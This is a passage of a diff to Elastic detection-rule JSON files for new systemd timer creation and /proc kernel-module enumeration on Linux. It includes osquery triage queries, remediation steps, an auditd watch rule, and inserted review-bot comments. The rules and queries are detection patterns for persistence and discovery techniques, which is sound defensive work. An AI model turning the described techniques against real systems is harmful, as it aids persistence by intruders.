OR\\npath LIKE '/usr/lib/systemd/system/%' OR\\npath LIKE '/home/{{user.name}}/.config/systemd/user/%'\\n)\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses systemd timers for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service/timer or restore its original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating New Systemd Timer Created\n\nSystemd timers are used for scheduling and automating recurring tasks or services on Linux systems. \n\nAttackers can leverage systemd timers to run scripts, commands, or malicious software at system boot or on a set time interval by creating a systemd timer and a corresponding systemd service file. 
\n\nThis rule monitors the creation of new systemd timer files, potentially indicating the creation of a persistence mechanism.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the timer file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate the currently enabled systemd timers through the following command `sudo systemctl list-timers`.\n- Search for the systemd service file named similarly to the timer that was created.\n- Investigate whether any other files in any of the available systemd directories have been altered through OSQuery.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (\\npath LIKE '/etc/systemd/system/%' OR \\npath LIKE '/usr/local/lib/systemd/system/%' OR \\npath LIKE '/lib/systemd/system/%' OR\\npath LIKE '/usr/lib/systemd/system/%' OR\\npath LIKE '/home/user/.config/systemd/user/%'\\n)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n 
datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (\\npath LIKE '/etc/systemd/system/%' OR \\npath LIKE '/usr/local/lib/systemd/system/%' OR \\npath LIKE '/lib/systemd/system/%' OR\\npath LIKE '/usr/lib/systemd/system/%' OR\\npath LIKE '/home/{{user.name}}/.config/systemd/user/%'\\n)\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. 
\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses systemd timers for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service/timer or restore its original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "host.os.type : \"linux\" and event.action : (\"creation\" or \"file_create_event\") and file.extension : \"timer\" and\nfile.path : (/etc/systemd/system/* or /usr/local/lib/systemd/system/* or /lib/systemd/system/* or \n/usr/lib/systemd/system/* or /home/*/.config/systemd/user/*) and not process.name : (\n \"docker\" or \"dockerd\" or \"dnf\" or \"yum\" or \"rpm\" or \"dpkg\" or \"executor\" or \"cloudflared\"\n)\n", "references": [ "https://opensource.com/article/20/7/systemd-timers", 
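Review bot: In the new `note` the first file-listing Osquery query hardcodes `path LIKE '/home/user/.config/systemd/user/%'`, while the second query a few lines later uses `/home/{{user.name}}/.config/systemd/user/%`; as written the first query only inspects a home directory literally named `user` and will miss user-level timer directories for the account in the alert, even though the rule's own `file.path` clause matches `/home/*/.config/systemd/user/*`. The same text appears in the `_7.json` hunk (`@@ -18,7 +18,7 @@`) below. Change the first query to `path LIKE '/home/{{user.name}}/.config/systemd/user/%'` so both queries resolve against the alert's user. If these JSON files are exported from the upstream rule definitions, the change belongs there; the enclosing rule object extends beyond the hunk.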
@@ -72,7 +72,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_7.json b/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_7.json
index f73fb78a921..ae5b3cf6750 100644
--- a/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_7.json
+++ b/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_7.json
@@ -18,7 +18,7 @@ "file.path", "process.executable" ], - "note": "## Triage and analysis\n\n### Investigating New Systemd Timer Created\n\nSystemd timers are used for scheduling and automating recurring tasks or services on Linux systems. \n\nAttackers can leverage systemd timers to run scripts, commands, or malicious software at system boot or on a set time interval by creating a systemd timer and a corresponding systemd service file. \n\nThis rule monitors the creation of new systemd timer files, potentially indicating the creation of a persistence mechanism.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the timer file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate the currently enabled systemd timers through the following command `sudo systemctl list-timers`.\n- Search for the systemd service file named similarly to the timer that was created.\n- Investigate whether any other files in any of the available systemd directories have been altered through OSQuery.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (\\npath LIKE '/etc/systemd/system/%' OR \\npath LIKE '/usr/local/lib/systemd/system/%' OR \\npath LIKE '/lib/systemd/system/%' OR\\npath LIKE '/usr/lib/systemd/system/%' OR\\npath LIKE '/home/user/.config/systemd/user/%'\\n)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (\\npath LIKE '/etc/systemd/system/%' OR \\npath LIKE '/usr/local/lib/systemd/system/%' OR \\npath LIKE '/lib/systemd/system/%' OR\\npath LIKE '/usr/lib/systemd/system/%' OR\\npath LIKE '/home/{{user.name}}/.config/systemd/user/%'\\n)\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses systemd timers for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service/timer or restore its original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating New Systemd Timer Created\n\nSystemd timers are used for scheduling and automating recurring tasks or services on Linux systems. \n\nAttackers can leverage systemd timers to run scripts, commands, or malicious software at system boot or on a set time interval by creating a systemd timer and a corresponding systemd service file. 
\n\nThis rule monitors the creation of new systemd timer files, potentially indicating the creation of a persistence mechanism.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the timer file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate the currently enabled systemd timers through the following command `sudo systemctl list-timers`.\n- Search for the systemd service file named similarly to the timer that was created.\n- Investigate whether any other files in any of the available systemd directories have been altered through OSQuery.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (\\npath LIKE '/etc/systemd/system/%' OR \\npath LIKE '/usr/local/lib/systemd/system/%' OR \\npath LIKE '/lib/systemd/system/%' OR\\npath LIKE '/usr/lib/systemd/system/%' OR\\npath LIKE '/home/user/.config/systemd/user/%'\\n)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n 
datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (\\npath LIKE '/etc/systemd/system/%' OR \\npath LIKE '/usr/local/lib/systemd/system/%' OR \\npath LIKE '/lib/systemd/system/%' OR\\npath LIKE '/usr/lib/systemd/system/%' OR\\npath LIKE '/home/{{user.name}}/.config/systemd/user/%'\\n)\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. 
\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses systemd timers for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service/timer or restore its original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "host.os.type : \"linux\" and event.action : (\"creation\" or \"file_create_event\") and file.extension : \"timer\" and\nfile.path : (/etc/systemd/system/* or /usr/local/lib/systemd/system/* or /lib/systemd/system/* or \n/usr/lib/systemd/system/* or /home/*/.config/systemd/user/*) and not process.name : (\n \"docker\" or \"dockerd\" or \"dnf\" or \"yum\" or \"rpm\" or \"dpkg\" or \"executor\" or \"cloudflared\"\n)\n", "references": [ "https://opensource.com/article/20/7/systemd-timers", 
@@ -72,7 +72,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/80084fa9-8677-4453-8680-b891d3c0c778_1.json b/packages/security_detection_engine/kibana/security_rule/80084fa9-8677-4453-8680-b891d3c0c778_1.json
index 30ced422f23..49cb007e351 100644
--- a/packages/security_detection_engine/kibana/security_rule/80084fa9-8677-4453-8680-b891d3c0c778_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/80084fa9-8677-4453-8680-b891d3c0c778_1.json
@@ -15,7 +15,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Enumeration of Kernel Modules via Proc", - "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. 
With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "query": "file where host.os.type == \"linux\" and event.action == \"opened-file\" and \nfile.path == \"/proc/modules\" and not process.parent.pid == 1\n", "required_fields": [ { 
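Review bot: The new `note` prescribes `-w /proc/ -p r -k audit_proc`, a read watch on the whole of `/proc/`, but says nothing about the event volume that produces; process-listing tools and monitoring agents read `/proc` continuously, so on a busy host this single watch can flood the audit log and the integration while the detection itself only needs opens of `/proc/modules`. The same text appears in the `setup` hunk (`@@ -41,7 +41,7 @@`) below. Consider adding, after the rule block, a sentence such as `This watch records every read under /proc and can be very high volume; validate the event rate on a representative host, and whether a narrower watch on /proc/modules is sufficient on your kernel, before deploying it fleet-wide.` If these JSON files are exported from the upstream rule definitions, the wording change belongs there; the enclosing rule object extends beyond the hunk.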
@@ -41,7 +41,7 @@ ], "risk_score": 47, "rule_id": "80084fa9-8677-4453-8680-b891d3c0c778", - "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. 
With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/80084fa9-8677-4453-8680-b891d3c0c778_103.json b/packages/security_detection_engine/kibana/security_rule/80084fa9-8677-4453-8680-b891d3c0c778_103.json index da2e5bf604f..7dfb70b8cb5 100644 --- a/packages/security_detection_engine/kibana/security_rule/80084fa9-8677-4453-8680-b891d3c0c778_103.json +++ b/packages/security_detection_engine/kibana/security_rule/80084fa9-8677-4453-8680-b891d3c0c778_103.json 
@@ -22,7 +22,7 @@ "host.id", "process.executable" ], - "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. 
With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "query": "host.os.type:linux and event.category:file and event.action:\"opened-file\" and file.path:\"/proc/modules\"\n", "required_fields": [ { 
@@ -48,7 +48,7 @@ ], "risk_score": 21, "rule_id": "80084fa9-8677-4453-8680-b891d3c0c778", - "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. 
With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "severity": "low", "tags": [ "OS: Linux", @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/80084fa9-8677-4453-8680-b891d3c0c778_104.json b/packages/security_detection_engine/kibana/security_rule/80084fa9-8677-4453-8680-b891d3c0c778_104.json index f61751937e3..e0e8adc0ec6 100644 --- a/packages/security_detection_engine/kibana/security_rule/80084fa9-8677-4453-8680-b891d3c0c778_104.json +++ b/packages/security_detection_engine/kibana/security_rule/80084fa9-8677-4453-8680-b891d3c0c778_104.json 
